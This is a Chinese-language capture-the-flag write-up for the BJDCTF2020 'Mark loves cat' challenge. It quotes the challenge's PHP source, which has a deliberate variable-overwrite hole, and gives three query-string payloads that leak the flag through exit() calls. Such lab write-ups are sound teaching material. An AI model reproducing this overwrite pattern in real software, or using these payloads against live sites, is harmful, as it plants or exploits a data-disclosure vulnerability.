[BJDCTF2020]Mark loves cat三种解法

0x00 前言

比较基本的代码审计，考查变量覆盖
目录滚一下

Githack -> down一下
不知道为什么现在flag.php和index.php都down不下来了 --?可能靶场环境问题把

直接拿师傅wp里的源码了
关于对源码的个人理解我已标明在注释中

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){   
    $$x = $y;  //POST型声明至当前文件
}

foreach($_GET as $x => $y){
    $$x = $$y; //GET型变量重新赋值为当前文件变量中以其值为键名的值
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){ //如果GET型中flag变量的值等于GET型中一个不为flag的键名则退出
        
        exit($handsome); //exit显然能利用
    }
}
 //如果GET型和POST型中都没有变量flag,则退出
if(!isset($_GET['flag']) && !isset($_POST['flag'])){ 
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

echo "the flag is: ".$flag;

一开始没有想到能利用exit里的变量，丢脸了…
就想着过三层判断输出flag，没想到被自己覆盖了…
水平有限，至今没想出怎么绕过三个if且不覆盖的情况下在最后一层输出flag

0x01 三解

利用handsome

/?handsome=flag
通过如下
$handsome=$flag
从而成功获取flag
为满足条件退出追加两个参数 x=flag&flag=x

foreach($_GET as $x => $y){
    $$x = $$y; //GET型变量重新赋值为当前文件变量中以其值为键名的值
}
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){ //如果GET型中flag变量的值等于GET型中一个不为flag的键名则退出
        
        exit($handsome); //exit显然能利用
    }
}

所以poc

/?handsome=flag&flag=x&x=flag

利用yds

比较简单 直接 /?yds=flag即可

foreach($_GET as $x => $y){
    $$x = $$y; //GET型变量重新赋值为当前文件变量中以其值为键名的值
}
 //如果GET型和POST型中都没有变量flag,则退出
if(!isset($_GET['flag']) && !isset($_POST['flag'])){ 
    exit($yds);
}

利用is

/?is=flag&flag=flag

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

参考文章

https://blog.csdn.net/qq_43622442/article/details/105925473

0x02 rethink

这篇有点水…
一步步来吧